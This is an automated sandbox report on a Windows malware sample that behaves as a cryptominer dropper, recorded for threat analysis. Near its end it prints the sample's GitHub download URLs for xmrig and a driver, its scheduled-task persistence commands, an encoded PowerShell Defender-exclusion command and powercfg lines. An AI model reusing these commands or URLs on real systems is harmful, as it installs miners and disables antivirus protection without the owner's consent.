popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

mmfqdf2p9r107.exe

Generic Malware Malicious Library task schedule Antivirus UPX AntiDebug OS Processor Check PE32 PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2023, 7:25 a.m. July 4, 2023, 7:28 a.m.
Size 3.5MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 47d27bb5f4a208f3081471d00e87d1e4
SHA256 618d5757cf057b15ac4608340b2c7f641bf56661da501b5084b0fa9212a1dcfd
CRC32 ABD7CDD4
ssdeep 24576:wtpH9qTz57hM4/btkcXoTYMl6cexqJJnDIT69NyvONbeKtppAFZg+v:qM57hr7+MxqJJnsT69dbeKtp4
PDB Path C:\Users\Администратор\Downloads\Documents\7vrbr3\output.pdb
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
pastebin.com
A 172.67.34.170
A 104.20.67.143
A 104.20.68.143
172.67.34.170
github.com
A 20.200.245.247
20.200.245.247
IP Address Status Action
104.20.68.143 Active Moloch
164.124.101.2 Active Moloch
20.200.245.247 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49169 -> 104.20.68.143:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 20.200.245.247:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 20.200.245.247:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49169
104.20.68.143:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2
192.168.56.101:49175
20.200.245.247:443 		C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a
TLS 1.2
192.168.56.101:49176
20.200.245.247:443 		C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:26
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + <#7Oxy#> Add-MpPreference <<<< <#yncLy6#> -ExclusionPath @($env:UserProfile,
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: $env:SystemDrive) <#OZHvauKLSqJ#> -Force <#0f1pt3a#>
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Hibernation failed with the following error: The request is not supported. The following items are preventing hibernation on this system. The system firmware does not support hibernation.
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00612bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006135b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006129f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006129f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006129f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006132b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006133f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613738
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00613678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path C:\Users\Администратор\Downloads\Documents\7vrbr3\output.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .textbss
section .KA5
section .00cfg
packer Microsoft Visual C++ V8.0 (Debug)
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
mmfqdf2p9r107+0x44325 @ 0x114325
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.esp: 7863660
registers.edi: 38576128
registers.eax: 2648
registers.ebp: 7863684
registers.edx: 2130566132
registers.ebx: 5120
registers.esi: 3034136
registers.ecx: 2560
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/PTNbBX9V
suspicious_features GET method with no useragent header suspicious_request GET https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
suspicious_features GET method with no useragent header suspicious_request GET https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
suspicious_features GET method with no useragent header suspicious_request GET https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe
request GET https://pastebin.com/raw/PTNbBX9V
request GET https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
request GET https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
request GET https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ff000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004cb000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x47c60000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x736c2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00bd0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00dc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72de2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7363b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00bd0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00417000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734ea000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73251000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x700a1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fe36000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b2a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b231000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b1e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b1d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b1b1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\ProgramData\Dllhost\
filepath: C:\ProgramData\Dllhost\
1 1 0

SetFileAttributesW

 file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\ProgramData\HostData\
filepath: C:\ProgramData\HostData\
1 1 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7447" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline "cmd.exe" /C powershell -EncodedCommand "PAAjADcATwB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AG4AYwBMAHkANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBPAFoASAB2AGEAdQBLAEwAUwBxAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMABmADEAcAB0ADMAYQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
